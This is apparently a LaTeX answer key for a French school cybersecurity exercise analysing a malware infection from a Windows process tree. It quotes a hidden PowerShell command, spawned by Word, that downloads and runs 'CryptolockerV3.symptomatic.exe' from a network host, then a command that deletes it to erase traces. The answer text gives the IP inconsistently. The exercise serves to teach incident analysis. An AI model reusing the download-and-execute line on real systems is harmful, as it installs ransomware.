\documentclass[12pt,a4paper,article,firamath]{nsi}
\pagestyle{empty}
\begin{document}
\titre{Analyse d'une malveillance \small  Corrigé}
\classe{NSI - Cyber}
\maketitle

\begin{enumeratew}
\item On reconstruit l'arborescence des processus :
\begin{center}
    \includegraphics[width=17cm]{img/00}
\end{center}
\item Processus 6993 :
\begin{center}
\includegraphics[width=17cm]{img/01}
    \begin{tcolorbox}[colback=white,colframe=UGLiRed!75,width=12cm]
        {\color{UGLiBlue}\titlefont{PROCESS SUMMARY}}\\
        \textbf{User:} N/A\\
        \textbf{Name:} cmd.exe (CLI interpreter)\\
        \textbf{UID:} FF5A27C765D10611\\
        \textbf{ID:} 6993\\
        \textbf{Command Line:}
        \texttt{/c powershell.exe -nop -exec\\
            bypass -w hidden "((New-Object System.Net.W\\
            ebClient).DownloadFile('http://192.168.50.1\\
            04/CryptolockerV3.symptomatic.exe','\%TEMP\%\backslash\\
            CryptolockerV3.symptomatic.exe'))"\&\%TEMP\%\backslash C\\ryptolockerV3.symptomatic.exe}
    \end{tcolorbox}
\end{center}

\begin{enumalph}
    \item Ce processus a été créé par Microsoft Word (\texttt{WINWORD.EXE}). On sait que ce logiciel peut exécuter des « macros » qui à leur tour peuvent lancer d'autres applications, c'est sans doute ce qui s'est passé ici.
    \item Le processus a téléchargé un fichier (probablement de manière cachée ou silencieuse) dans un répertoire temporaire.
    \item Le fichier s'appelle \texttt{CryptolockerV3.symptomatic.exe}.
    \item Le fichier a été téléchargé depuis la machine d'IP \texttt{192.158.50.104}. C'est probablement un IP du même réseau ou d'un réseau local adjacent, ce qui signifie que d'autres machines de l'entreprise sont infectées.
\end{enumalph}

\item Processus 7331 :
\begin{center}
    \includegraphics[width=17cm]{img/02}
    \begin{tcolorbox}[colback=white,colframe=UGLiRed!75,width=12cm]
        {\color{UGLiBlue}\titlefont{PROCESS SUMMARY}}\\
        \textbf{User:} N/A\\
        \textbf{Name:} cmd.exe (CLI interpreter)\\
        \textbf{UID:} 7D94F65F58D992F7\\
        \textbf{ID:} 7331\\
        \textbf{Command Line:}\\
        \texttt{/c del C:\backslash Users\backslash OCD-VI$\sim$1\backslash AppDat\\
            a\backslash Local\backslash Temp\backslash CRYPTO$\sim$1.EXE>>NUL}\\
    \end{tcolorbox}
\end{center}
Le processus 7331 cherche à supprimer le fichier \texttt{CryptolockerV3.symptomatic.exe} dans le but d'effacer les traces du téléchargement.
\item On peut penser que le processus \texttt{ffvpfmn.exe} poursuit une activité malveillante.
\end{enumeratew}
\end{document}